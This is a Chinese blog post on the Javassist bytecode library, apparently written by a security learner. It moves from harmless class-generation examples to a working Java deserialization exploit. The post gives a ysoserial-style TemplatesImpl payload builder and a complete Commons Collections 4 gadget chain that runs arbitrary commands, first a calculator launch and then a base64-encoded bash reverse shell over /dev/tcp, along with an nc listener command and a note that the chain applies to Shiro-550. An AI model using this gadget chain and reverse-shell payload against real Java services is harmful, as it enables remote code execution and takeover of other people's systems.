java--javassist学习

最新推荐文章于 2024-05-11 15:40:01 发布
最新推荐文章于 2024-05-11 15:40:01 发布
阅读量4.8k 收藏 9
点赞数 2
分类专栏: 代码审计学习 文章标签: java 学习 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/125289705
版权

Javassist是一个开源的分析、编辑和创建Java字节码的类库。是由东京工业大学的数学和计算机科学系的 Shigeru Chiba (千叶 滋)所创建的。它已加入了开放源代码JBoss 应用服务器项目,通过使用Javassist对字节码操作为JBoss实现动态AOP框架。javassist是jboss的一个子项目,其主要的优点,在于简单,而且快速。直接使用java编码的形式,而不需要了解虚拟机指令,就能动态改变类的结构,或者动态生成类。

Javassist中最为重要的是ClassPool,CtClass ,CtMethod 以及 CtField这几个类。

ClassPool:一个基于HashMap实现的CtClass对象容器,其中键是类名称,值是表示该类的CtClass对象。默认的ClassPool使用与底层JVM相同的类路径,因此在某些情况下,可能需要向ClassPool添加类路径或类字节。

CtClass:表示一个类,这些CtClass对象可以从ClassPool获得。

CtMethods:表示类中的方法。

CtFields :表示类中的字段。

首先看一下常用的方法

ClassPool pool = ClassPool.getDefault();
Loader loader = new Loader(pool);
CtClass ct = pool.makeClass("JavassistTestResult");//创建类
ct.setInterfaces(new CtClass[]{pool.makeInterface("java.io.Serializable")});//让该类实现Serializable接口
CtField f= new CtField(CtClass.intType,"id",ct);//生成一个字段 类型为int 名字为id
​
f.setModifiers(AccessFlag.PUBLIC);//将字段设置为public
​
ct.addField(f);//将字段设置到类上
​
CtConstructor constructor=CtNewConstructor.make("public GeneratedClass(int pId){this.id=pId;}",ct);//添加构造函数
​
ct.addConstructor(constructor);
​
CtMethod helloM=CtNewMethod.make("public void hello(String des){ System.out.println(des);}",ct);//添加方法
​
ct.addMethod(helloM);

ct.writeFile("/Users/zyer/Downloads/untitled/out/production/untitled/");//将生成的.class文件保存到磁盘
​
Class c = loader.loadClass("JavassistTestResult");
​
Constructor constructor1 = c.getDeclaredConstructor(int.class);
​
Object object = constructor1.newInstance(1);
​

javassist的学习难度应该不是很大,但主要依赖于反射这一部分,复习一下

  • Field:对变量进行操作
  • Constructor:对构造方法进行操作
  • Method:对普通方法进行操作

随便联系一下使用就可以了,具体利用TemplatesImpl网上有写好的函数,我们直接输入命令就可以直接生成对应的class文件,下面看一下我的练习

import javassist.*;
import javassist.bytecode.AccessFlag;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class Javassist {
    public static void main(String[] args) throws NotFoundException, IOException, CannotCompileException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
        ClassPool pool = ClassPool.getDefault();
        Loader loader = new Loader(pool);
        CtClass ct = pool.makeClass("zyer");
        CtField field = new CtField(CtClass.intType,"age",ct);
        field.setModifiers(AccessFlag.PUBLIC);
        ct.addField(field);
        CtConstructor constructor = CtNewConstructor.make("public GeneratedClass(int age){this.age=age;}",ct);
        ct.addConstructor(constructor);
        CtMethod method = CtNewMethod.make("public void hello(int age){System.out.println(age);}",ct);
        ct.addMethod(method);
        String cmd = "public static void main(String[] args) {System.out.println(\"my name is zyer\");}";
        CtMethod method1 = CtNewMethod.make(cmd,ct);
        ct.addMethod(method1);
        ct.writeFile("/Users/zyer/Downloads/untitled/out/production/untitled/");
        Class name = loader.loadClass("zyer");
        Constructor constructor1 = name.getDeclaredConstructor(int.class);
        Object obj = constructor1.newInstance(1);
        Method method2 = name.getDeclaredMethod("hello",int.class);
        method2.invoke(obj,123);
        Method method3 = name.getDeclaredMethod("main",String[].class);
        method3.invoke(null,(Object) new String[]{});

    }
}

发现会生成对应的class文件

实际利用代码,这里使用函数形式

public static Object createTemplatesImpl(String command) throws Exception{
        Object templates = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl").newInstance();
        ClassPool pool = ClassPool.getDefault();
        final CtClass clazz = pool.get(Gadgets.StubTransletPayload.class.getName());
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
                command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
                "\");";
        ((CtClass) clazz).makeClassInitializer().insertAfter(cmd);
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        final byte[] classBytes = clazz.toBytecode();
        setFieldValue(templates, "_bytecodes", new byte[][] {classBytes});
        setFieldValue(templates, "_name", "Pwnr");
        setFieldValue(templates, "_tfactory", Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());
        return templates;

    }

public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj, value);
}

 

下面是对cc4链的利用操作,将我之前使用的远程加载,变成使用javassist在本地新建从而进行命令执行(弹计算器)

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.bag.TreeBag;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import ysoserial.payloads.util.Gadgets;
import java.io.*;
import java.lang.reflect.Field;


public class cc4 {
    public static Object createTemplatesImpl(String command) throws Exception{
        Object templates = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl").newInstance();
        ClassPool pool = ClassPool.getDefault();
        final CtClass clazz = pool.get(Gadgets.StubTransletPayload.class.getName());
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
                command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
                "\");";
        ((CtClass) clazz).makeClassInitializer().insertAfter(cmd);
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        final byte[] classBytes = clazz.toBytecode();
        setFieldValue(templates, "_bytecodes", new byte[][] {classBytes});
        setFieldValue(templates, "_name", "Pwnr");
        setFieldValue(templates, "_tfactory", Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());
        return templates;

    }
    public static void main(String[] args) throws Exception {
        Object obj = createTemplatesImpl("open -a Calculator.app");
        System.out.println(obj);
        Transformer transformer = new InvokerTransformer("toString", new Class[]{}, new Object[]{});
        TransformingComparator comparator  = new TransformingComparator(transformer);
        TreeBag treeBag = new TreeBag(comparator);
        treeBag.add(obj);
        Field field = InvokerTransformer.class.getDeclaredField("iMethodName");
        field.setAccessible(true);
        field.set(transformer,"getOutputProperties");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));
        objectOutputStream.writeObject(treeBag);
        objectOutputStream.close();
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));
        objectInputStream.readObject();


    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

反弹shell

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.bag.TreeBag;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import ysoserial.payloads.util.Gadgets;
import java.io.*;
import java.lang.reflect.Field;


public class cc4 {
    public static Object createTemplatesImpl(String command) throws Exception{
        Object templates = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl").newInstance();
        ClassPool pool = ClassPool.getDefault();
        final CtClass clazz = pool.get(Gadgets.StubTransletPayload.class.getName());
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
                command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
                "\");";
        ((CtClass) clazz).makeClassInitializer().insertAfter(cmd);
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        final byte[] classBytes = clazz.toBytecode();
        setFieldValue(templates, "_bytecodes", new byte[][] {classBytes});
        setFieldValue(templates, "_name", "Pwnr");
        setFieldValue(templates, "_tfactory", Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());
        return templates;

    }
    public static void main(String[] args) throws Exception {
        Object obj = createTemplatesImpl("bash -c {echo,L2Jpbi9iYXNoIiwiLWMiLCJiYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}");
        System.out.println(obj);
        Transformer transformer = new InvokerTransformer("toString", new Class[]{}, new Object[]{});
        TransformingComparator comparator  = new TransformingComparator(transformer);
        TreeBag treeBag = new TreeBag(comparator);
        treeBag.add(obj);
        Field field = InvokerTransformer.class.getDeclaredField("iMethodName");
        field.setAccessible(true);
        field.set(transformer,"getOutputProperties");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));
        objectOutputStream.writeObject(treeBag);
        objectOutputStream.close();
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));
        objectInputStream.readObject();


    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

其中命令是对bash命令进行编码:

bash -i >& /dev/tcp/ip/port 0>&1

使用在线网站(java命令执行payloads - 小草窝博客

 

可以看到会反弹shell,证明命令执行了

 

 这里使用nc命令的时候如果不加 参数 n 会报错,应该是域名解析有问题,那么我们使用命令

nc -lnvvp 5555

 就可以成功反弹shell了。

cc4可以应用在shiro550上,后续会手动复现一下。

zyer1
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
javassist学习
路漫漫其修远兮,吾将上下而求索。
01-03 380
Java 字节码以二进制的形式存储在 .class 文件中,每一个 .class 文件包含一个 Java 类或接口。Javaassist 就是一个用来 处理 Java 字节码的类库。它可以在一个已经编译好的类中添加新的方法,或者是修改已有的方法,并且不需要对字节码方面有深入的了解。同时也可以去生成一个新的类对象,通过完全手动的方式。在 Javassist 中,类表示 class 文件。
javassist-3.15.0-GA
10-17
这个版本"javassist-3.15.0-GA"是Javaassist的一个特定发行版,用于支持Java平台的代码操作。 1. **Javaassist基本概念**: - **ClassPool**:Javaassist的核心组件,它维护了一个类的集合,允许我们获取或创建类...
javassist使用指南
mChenys的博客
02-13 8519
目录一、快速入门1.1 创建class文件1.2 ClassPool的相关方法1.3 CtClass的相关方法1.4 CtMethod的相关方法1.5 调用生成的类对象1.5.1 通过反射调用1.5.2 通过接口调用1.6 修改现有的类对象二、将类冻结三、类搜索路径四、$开头的特殊字符五、ProxyFactory的使用 我们知道Java字节码以二进制的形式存储在class文件中,每一个class文件包含一个Java类或接口。Javaassist 就是一个用来处理Java字节码的类库。在Javassist
Java中的高性能字节码工具:Javassist
lt_xiaodou的博客
09-13 1906
一般常见的动态方法调用使用Reflection或者字节码生成技术。虽然JDK已对反射进行了优化但在追求性能的场景中仍然显得性能不佳。本文即是介绍一个面向程序员友好的字节码操作类库javassist。根据benchmark其展现的性能已几乎无异于直接调用。开源地址:javassist,简单地看一下官方介绍:Javassist 使 Java 字节码操作变得简单。它是一个用于在 Java 中编辑字节码的类库。它使 Java 程序可以在运行时定义新类,并在 JVM 加载它时修改类文件。
Java最新springboot 整合javassist详解_javassist 混合使用,阿里巴巴面试会问的问题
最新发布
2401_83977546的博客
05-11 794
Javassist 是一个开源,用于分析、编辑和创建Java字节码的类库,由东京工业大学数学和计算机科学系的 Shigeru Chiba (千叶滋)所创建。目前已加入了开放源代码JBoss 应用服务器项目,通过使用Javassist对字节码操作为JBoss实现动态"AOP"框架。通过使用Javassist可以使Java程序在运行时定义一个新的类,并且在JVM加载类文件时修改它Javassist提供两个级别的API:源码级别和字节码级别。
Javassit介绍
hewei314599782的博客
04-15 973
Javassist 动态生成字节码技术。操作java字节码的工具有两个比较流行,一个是ASM,一个是Javassit 。 ASM :直接操作字节码指令,执行效率高,要是使用者掌握Java类字节码文件格式及指令,对使用者的要求比较高。 Javassist: 提供了更高级的API,执行效率相对较差,但无需掌握字节码指令的知识,对使用者要求较低。 Javassist是一个开源的分析、编辑和创建Java字节码的类库。Javassist中最为重要的是ClassPool,CtClass,CtMethod 以及 C
javassist初探
h1311454244的博客
12-23 245
在平时的编程中,我们往往是写好了类,编译成字节码和分配内存这些工作我们是不必关心的,那么就有了一个疑问,我们能否自己编写字节码文件从而生成对象呢?答案是可以的,千叶兹教授创建了javassist令我们可以动态的生成字节码,也就是通过代码来生成指定的字节码文件,下面做一个演示。 1.首先记得导入包。 2. public class DynClass { public static void...
androidjava源码-android-source-browsing.platform--external--javassist:自动从
05-20
Android源码的浏览提供了对系统底层工作原理的洞察,而`javassist`库则是一个强大的工具,用于在运行时修改Java类。`android-source-browsing.platform--external--javassist`这个项目就是Android源码的一部分,它...
java 反编译工具 jboss-javassist
09-02
2. **学习API**:熟悉Javassist提供的各种类和方法,如`ClassPool`、` CtClass`、`CtMethod`等,这些都是操作字节码的核心类。 3. **创建或修改类**:通过`ClassPool`获取或创建类对象,然后利用`CtClass`的方法来...
javassist-example
05-13
这个名为 "javassist-example" 的项目很可能是用来演示如何使用 Javaassist 库的实例集合。通过分析这个项目的源代码,我们可以深入理解 Javaassist 的核心功能和应用场景。 Javaassist 提供了一种简单的方法来处理...
javaagent+javassist
12-25
Javaagent和javassistJava开发中的两个重要工具,它们在软件开发中有着广泛的应用,特别是在动态代理、代码增强和字节码操作等领域。本篇将详细介绍这两个技术,并结合实际示例进行解析。 首先,让我们来了解`...
注解、反射、动态编译、字节码操作
居家小男的博客
09-11 452
注解、反射、字节码操作 前言:本篇博客将介绍Java中注解的定义、使用以及反射对Java动态性的支持和Java字节码操作,通过本篇内容,读者将对Java知识有更加深刻的理解,同时为后面Android的高级框架学习打好基础。 一、注解 概述: Annotation是从JDK5.0开始引入的,注解并不是程序本身,但可以被其他程序读取,如果没有注解信息处理流程,注解将毫无意义。注解可以在Java很多地方使用,如类、属性、方法等等。 1-注解入门 2-内置注解 3-自定义注解、元注解 二、反射 三
Javassist】快速入门系列14 使用Javassist导入包路径
Vaxue的博客
01-02 1739
上一章我们介绍了使用Javassist获取注解,本章主要介绍使用Javassist导入包路径。本篇文章介绍了如何使用Javassist导入包路径。了解了除java.lang包外,Javassist的源代码中的所有类名必须是完全限定名(它们必须包括包名)。
javassist 常用方法整理
qq_24209665的博客
07-20 3041
javassist简介 一个比较好的例子:http://yucaifu1989.iteye.com/blog/1850500 比较好的文档:http://blog.csdn.net/u011425751/article/details/51917895   Javassist是一个开源的java字节码操作工具,主要是对已经编译好的class文件进行修改和处理,这里我写了一个简单的说明,复杂
Javassit初探
Java Programming
12-29 160
官网/参考: http://www.csg.ci.i.u-tokyo.ac.jp/~chiba/javassist/  https://github.com/jboss-javassist/javassist http://www.ibm.com/developerworks/cn/java/coretech/java-dynamic.html   ClassPool classPool...
字节码操作_javassist库_动态创建新类_属性_方法_构造器_API详解JAVA216-217
好好学习天天向上
04-02 5288
字节码操作_javassist库_动态创建新类_属性_方法_构造器_API详解JAVA216-217
javassist中的类名前缀Ct是什么意思?
码农无双的博客
11-22 627
javassist中有CtClass、CtField、CtBehavior等类,那么这些类名中的Ct是什么意思呢? Ct是Compile Time的缩写,即“编译时”的意思。因为CtClass表示一个class还没有被装载进java虚拟机,而java.lang.Class表示一个运行时class,它已经被装载进java虚拟机。 刚开始的时候Javassist不能和类加载器一起配合工作,所以Ct也不是什么坏的叫法。 那么为什么不叫Lt(Load Time)呢?作者Shigeru Chiba也想重命名,但是为时
利用Java反射机制和Javassist实现Java对象及其属性的动态创建生成
Dove饭特稀-博客
11-21 8716
开发过程中经常会遇到java对象的属性特征不确定的情况,比如属性的名称,属性的类型,属性的取值等不确定的情况,如何在java运行时获取这些信息?动态的设置java对象的属性值?借助java反射机制以及javassist能够轻松解决这些问题。
java Javassist的使用
u014248032的博客
06-21 420
import java.io.IOException; import javassist.CannotCompileException; import javassist.ClassPool; import javassist.CtClass; import javassist.CtConstructor; import javassist.CtField; import javassist....
javassist3.16.0-ga
05-16
Javassist3.16.0-ga是一个Java字节码编辑库,可以动态地生成、修改和反射类的字节码。它能够简化Java编程中涉及到类加载和字节码操作的复杂性,并且提供了更高层次的抽象,比如Expr类、CtClass类等,可以使开发更加快速和简便。Javassist还支持动态修改已有的Java类文件,比如增加、修改或删除方法、变量和构造函数等。此外,该库还可以将普通Java代码转换为字节码,以实现AOP等高级功能,支持在运行时修改类的类名、包名等元信息,也可以将多个类结合生成新的类文件。Javassist3.16.0-ga是目前较为流行的Java字节码操作库之一,被广泛应用于Java网络编程、ORM框架以及Java虚拟机开发等领域。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值